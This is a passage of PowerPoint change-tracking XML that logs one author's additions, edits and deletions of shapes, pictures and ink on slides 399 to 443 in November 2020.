          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:26:10.225" v="4242" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3105135552" sldId="399"/>
            <ac:picMk id="3" creationId="{76BFC92E-A289-4F02-85FD-B19B2ACADE44}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:31:03.080" v="4367" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2179685725" sldId="400"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:31:03.080" v="4367" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2179685725" sldId="400"/>
            <ac:spMk id="5" creationId="{100775B0-B438-434E-ABE0-E3FFFBEA0944}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:30:40.099" v="4346"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2179685725" sldId="400"/>
            <ac:spMk id="6" creationId="{7FA60A87-0DDA-40F8-A66A-23BD5DAA1ABC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:27:18.528" v="4248" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2179685725" sldId="400"/>
            <ac:picMk id="2" creationId="{71DC1B74-735A-4EE2-A1CA-593D232BBD5C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:28:11.359" v="4250" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2179685725" sldId="400"/>
            <ac:picMk id="3" creationId="{E80F66A3-1CE7-4C97-B235-E7B5E036F5F5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:28:29.400" v="4252" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2179685725" sldId="400"/>
            <ac:picMk id="4" creationId="{7C558AE4-8B6B-471B-A2EF-5F8589502CFA}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:45:32.801" v="5550" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3468553816" sldId="401"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:31:27.818" v="4393" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3468553816" sldId="401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20:35:15.375" v="4628" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3468553816" sldId="401"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-24T07:36:28.349" v="7919" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1067152736" sldId="402"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-24T07:36:28.349" v="7919" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1067152736" sldId="402"/>
            <ac:spMk id="2" creationId="{A35B625F-DA6E-4DFB-AF8F-C92E97F5C5C8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:41:10.834" v="5030" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1067152736" sldId="402"/>
            <ac:spMk id="3" creationId="{2BEDFB3C-FB40-4708-97C1-7D78199EE007}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-13T21:16:09.286" v="5063" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="450669678" sldId="403"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-13T21:16:06.751" v="5062" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669678" sldId="403"/>
            <ac:spMk id="3" creationId="{170F1F03-AD3B-40D4-A9A4-A23B6630DB7A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-13T21:16:06.751" v="5062" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669678" sldId="403"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:20:36.969" v="5405" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3506502368" sldId="403"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-13T21:16:15.980" v="5065" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3506502368" sldId="403"/>
            <ac:spMk id="2" creationId="{B156A80A-0859-4F06-A74C-1B4BABE5A6A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-13T21:16:15.980" v="5065" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3506502368" sldId="403"/>
            <ac:spMk id="3" creationId="{4B872C03-0D0D-46E5-A59E-E302898300B4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-13T21:36:36.953" v="5298" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3506502368" sldId="403"/>
            <ac:spMk id="8" creationId="{A13AF9DF-0783-4A8B-9B6E-5F8AD86489E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:19:19.593" v="5397" actId="113"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3506502368" sldId="403"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-13T21:22:38.118" v="5134"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3506502368" sldId="403"/>
            <ac:graphicFrameMk id="6" creationId="{9C17828D-ECCF-4B0E-829E-45E1CB731EA5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4T18:34:24.311" v="5331" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1652808251" sldId="411"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-14T18:34:24.311" v="5331" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1652808251" sldId="411"/>
            <ac:spMk id="2" creationId="{BBF03672-24FB-44A3-B5D9-4C1450E7FB6C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:28:22.049" v="5443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9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:27:42.626" v="5434" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1023509386" sldId="426"/>
            <ac:spMk id="2" creationId="{76FD6F19-51EC-4B7D-8EF6-594A8AA731EB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:28:04.804" v="5438" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1023509386" sldId="426"/>
            <ac:spMk id="517" creationId="{6048A784-D831-4B4B-9022-AEF16F6913FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:28:22.049" v="5443" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1023509386" sldId="426"/>
            <ac:spMk id="740" creationId="{561EC690-BEDA-4738-BD12-E80FA70B4028}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:28:07.986" v="5440"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1023509386" sldId="426"/>
            <ac:grpSpMk id="518" creationId="{98F0B99F-1C54-478B-9222-A8A40612C107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521" creationId="{95ECCBDC-FA78-4A06-BFF2-4DB1BAED7A0E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564" creationId="{EEF0F580-A249-4FCA-81F8-8D98AF0AF354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674" creationId="{787BB058-EB0A-4458-8433-7702D1F74088}"/>
          </ac:grpSpMkLst>
        </pc:grp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0" creationId="{3E27AEEB-1D24-4D14-AFB8-FC71C0BE6D4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2" creationId="{397960D1-B30C-4A96-9406-7F1A258BDD4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3" creationId="{00192F2A-5A1C-4004-8C0F-5F65002A60DD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4" creationId="{61A1A0AF-6953-4EEB-AF32-1CD148FA468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7" creationId="{88E93CAF-1486-413A-8446-8312C210016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8" creationId="{8A862113-AE01-430F-9DA1-3C17BFF915B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34" creationId="{77ABC0A2-98EC-488B-9283-A1C8793832F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38" creationId="{915113FE-4D56-459E-9231-4539FA626F5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44" creationId="{5642DC5C-2EDE-4D20-B576-13CAABCC6B4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49" creationId="{10A8D5D0-CAF0-48B1-A3B7-9043828FD39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0" creationId="{1204B474-7BE2-42C9-9DED-6806A2145D8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2" creationId="{8B73630A-0008-40E9-AD81-534E85F540D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3" creationId="{0596C9B6-88AB-468F-98B9-10DC2018F80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4" creationId="{A502DF22-3997-4928-92E8-D083522F0D1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6" creationId="{142B900B-405C-4AC5-A1AC-F8A988A19AE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8" creationId="{09343CFA-26E8-4DFF-8F7D-CD3EB6E1163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9" creationId="{AF16DB84-DD62-4EA8-BEE6-130E7704227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0" creationId="{ABF27324-8C6C-4B39-A0FE-D2E2910D4C1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1" creationId="{0D10E8F9-0931-45D3-B62A-64F49DD91D3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2" creationId="{2FF6B9BF-C297-499E-A27F-E46DA777681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3" creationId="{76EEE551-4204-4BD9-8DE7-A41310EDA09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6" creationId="{ECFA395A-6AAC-4A44-AC34-631A2D30938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2" creationId="{73528C1C-3C39-4705-B5F8-FE13F905D24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5" creationId="{3A807388-EE09-4BA0-94B7-3ACD45F02BB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9" creationId="{B25CA33E-6336-4065-BB4C-34707624846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3" creationId="{749116E1-DDF6-4158-B59A-6C02D08AC22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6" creationId="{B2503C7E-113A-4488-AE47-B9366D23337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9" creationId="{A9AC2C64-AF3D-4B51-A743-0C641F830E3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1" creationId="{76A9B3EF-D94A-4A3B-A995-92824AEE59C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2" creationId="{F989E3B2-F5F8-48E2-A65C-6F3C1E646F2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3" creationId="{A331A4BD-EA17-4531-9971-DBABAC7B55C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4" creationId="{8F23CB8C-06C4-4B3D-B186-A8BF65AE38C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5" creationId="{9D2BA46B-D0AF-4DC9-BA1A-D8CC241C3D9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8" creationId="{7F400AD1-0C80-48A5-8541-28C4F298A94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03" creationId="{300EB536-A4D4-405C-89FE-B0AF00C4C758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09" creationId="{26A94035-4737-4DFA-9F2C-6C1EDE83848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0" creationId="{9702A724-FA81-44A5-9425-1C1591C29B7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3" creationId="{649E1F0F-7561-4EB2-BB5B-9C70064127D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4" creationId="{4890D2AB-AADF-4C1B-A35A-374CAEDAB4D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5" creationId="{AB61D235-2F9C-4C23-A6D8-4FCD65EBC6B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6" creationId="{551D6B37-35D8-4E4F-A9C8-CBDF8A87B89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0" creationId="{C4212D96-BA8B-463C-8EE6-1F11A2D27C4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5" creationId="{A2AF77AC-6F9A-49E5-A775-CC1EFC00B4F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7" creationId="{79C60F49-BBD0-4393-BE19-01F1F7ABAC0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34" creationId="{420BFAE2-0846-496F-B660-41D9034B260E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1" creationId="{4CAE8FD1-0E10-4257-9877-FE4B4FD6E8B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2" creationId="{14E29E19-C371-4AB1-BBC4-10CC56E9DEA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4" creationId="{E8E5B9F3-CFC3-4B23-AD4B-87D1755A59B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55" creationId="{A0172084-3A31-44B4-98EC-A46C4B1F67E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3" creationId="{F0DB2347-9D1B-46EA-9E13-D4660F24371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5" creationId="{A5225147-8F2D-4159-991A-7A5C3C48527D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6" creationId="{1228E39B-BCE6-4CE5-9EEA-85CC735D7F9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7" creationId="{E66E8488-E1D3-4593-8D50-A4B63B0D6F0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8" creationId="{D8EC52B9-EDA1-42D6-9709-D2C42ECE167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9" creationId="{A0FB5DB0-1D7E-4E20-94DC-4C41C40C246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0" creationId="{72D2FD8B-CA2A-496A-82A9-80687EA2FDBE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4" creationId="{5C438428-6830-4677-88C2-245339B3838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8" creationId="{62475C65-97EC-4108-A589-A308B8B048C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6" creationId="{A1BF8EC6-936F-4FBC-9454-BA6D80AE9CC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7" creationId="{6C29BF09-2CFE-45A5-93EA-1E55349114E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8" creationId="{3D5C28B5-27EB-4607-A60D-FBAA3ADA5E9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04" creationId="{0D2C6F9D-A477-4725-A63F-5963AB2A322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08" creationId="{553123C5-A5A9-4E01-A63B-094292269D9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16" creationId="{4EB8D307-A169-4D46-950F-B50F319D4FC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22" creationId="{333C02A3-8969-45DE-BA8C-6172462BD20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26" creationId="{F593896F-F4DE-464F-BD98-55F26BD07DB4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-20T00:04:51.221" v="5567"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="621167348" sldId="428"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod ord modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-20T00:04:42.264" v="5566" actId="2696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9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:20:54.795" v="5410" actId="20577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31:26.727" v="5463"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3317277007" sldId="429"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:31:26.727" v="5463"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3317277007" sldId="42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36:23.824" v="5482" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1365994828" sldId="430"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:36:23.824" v="5482" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1365994828" sldId="43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42:23.243" v="5496" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3921662242" sldId="431"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:42:23.243" v="5496" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3921662242" sldId="43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45:12.576" v="5549" actId="14734"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="53262624" sldId="432"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:45:12.576" v="5549" actId="14734"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="53262624" sldId="432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9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-19T18:26:55.848" v="5557"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3836559749" sldId="433"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-20T00:04:42.264" v="5566" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="142062042" sldId="434"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-20T00:04:22.526" v="5563" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="142062042" sldId="434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9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-20T00:04:51.221" v="5567"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4117409162" sldId="434"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-20T00:04:37.953" v="5565" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1267997249" sldId="435"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-20T00:04:37.953" v="5565" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1267997249" sldId="43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0T00:04:59.773" v="5569" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3216010588" sldId="436"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-20T00:04:59.773" v="5569" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3216010588" sldId="43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9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:20:53.649" v="6690" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2715642866" sldId="437"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-20T00:05:08.141" v="5571" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2715642866" sldId="437"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T11:03:24.281" v="5691" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3983647624" sldId="438"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T11:03:24.281" v="5691" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3983647624" sldId="438"/>
            <ac:spMk id="2" creationId="{18D7FDDA-EDE1-4AE7-BFCC-AFCF5BA7D893}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T16:41:48.269" v="7041" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1618571919" sldId="439"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:32:51.981" v="5698" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1618571919" sldId="439"/>
            <ac:picMk id="2" creationId="{857F056C-F162-4311-9271-30E4557D0721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3:44.421" v="5703" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1618501848" sldId="440"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:33:44.421" v="5703" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1618501848" sldId="440"/>
            <ac:picMk id="2" creationId="{8E3E285F-183B-432B-A0E8-C35C1FCA1B47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5:01.437" v="5709" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="820321705" sldId="441"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:35:01.437" v="5709" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="820321705" sldId="441"/>
            <ac:picMk id="2" creationId="{48F5C6FF-0D6C-4369-902D-DA109B4F3E5E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:35:19.703" v="5711"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2607040475" sldId="442"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:35:19.703" v="5711"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2607040475" sldId="442"/>
            <ac:picMk id="2" creationId="{762DB1A0-2092-4174-B4F5-9E30A67FA78B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7:37.192" v="5729" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="977974222" sldId="443"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:37:37.192" v="5729" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="977974222" sldId="443"/>
            <ac:picMk id="2" creationId="{7E3578B4-6FB8-42DC-AA70-C92BBC63C9F4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T14:37:33.717" v="5728" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="977974222" sldId="443"/>
